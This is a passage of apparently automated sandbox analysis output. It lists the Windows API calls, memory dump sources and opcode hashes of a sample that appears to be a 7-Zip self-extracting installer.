                                              Similarity
                                              • API ID: TextWindow$ItemLength$??3@wsprintf
                                              • String ID: (%u%s)
                                              • API String ID: 3595513934-2496177969
                                              • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                              • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                              • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                              • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32
                                              • API String ID: 2574300362-3846845290
                                              • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                              • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                              • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                              • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                              • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32
                                              • API String ID: 2574300362-3900151262
                                              • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                              • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                              • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                              • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                              • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32
                                              • API String ID: 2574300362-736604160
                                              • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                              • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                              • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                              • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 1731127917-0
                                              • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                              • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                              • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                              • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                              APIs
                                              • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                              • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                              • wsprintfW.USER32 ref: 00403FFB
                                              • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: PathTemp$AttributesFilewsprintf
                                              • String ID:
                                              • API String ID: 1746483863-0
                                              • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                              • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                              • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                              • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                              APIs
                                              • CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                              • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                              • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                              • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: CharUpper
                                              • String ID:
                                              • API String ID: 9403516-0
                                              • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                              • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                              • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                              • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                              APIs
                                                • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                              • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                              • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                              • String ID:
                                              • API String ID: 2538916108-0
                                              • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                              • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                              • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                              • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                              APIs
                                              • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                              • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                              • CreateFontIndirectW.GDI32(?), ref: 00406849
                                              • DeleteObject.GDI32(00000000), ref: 00406878
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                              • String ID:
                                              • API String ID: 1900162674-0
                                              • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                              • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                              • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                              • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                              APIs
                                              • memset.MSVCRT ref: 0040749F
                                              • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                              • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                              • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                              • String ID:
                                              • API String ID: 1557639607-0
                                              • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                              • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                              • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                              • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$EnvironmentExpandStrings$??2@
                                              • String ID:
                                              • API String ID: 612612615-0
                                              • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                              • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                              • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                              • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                              APIs
                                                • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                              • SetWindowTextW.USER32(?,?), ref: 00403B12
                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@TextWindow$Length
                                              • String ID:
                                              • API String ID: 2308334395-0
                                              • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                              • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                              • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                              • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                              APIs
                                              • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                              • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                              • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                              • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: CreateFontIndirectItemMessageObjectSend
                                              • String ID:
                                              • API String ID: 2001801573-0
                                              • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                              • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                              • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                              • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                              APIs
                                              • GetParent.USER32(?), ref: 00401BA8
                                              • GetWindowRect.USER32(?,?), ref: 00401BC1
                                              • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                              • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ClientScreen$ParentRectWindow
                                              • String ID:
                                              • API String ID: 2099118873-0
                                              • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                              • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                              • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                              • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: _wtol
                                              • String ID: GUIFlags$[G@
                                              • API String ID: 2131799477-2126219683
                                              • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                              • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                              • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                              • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                              APIs
                                              • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: EnvironmentVariable
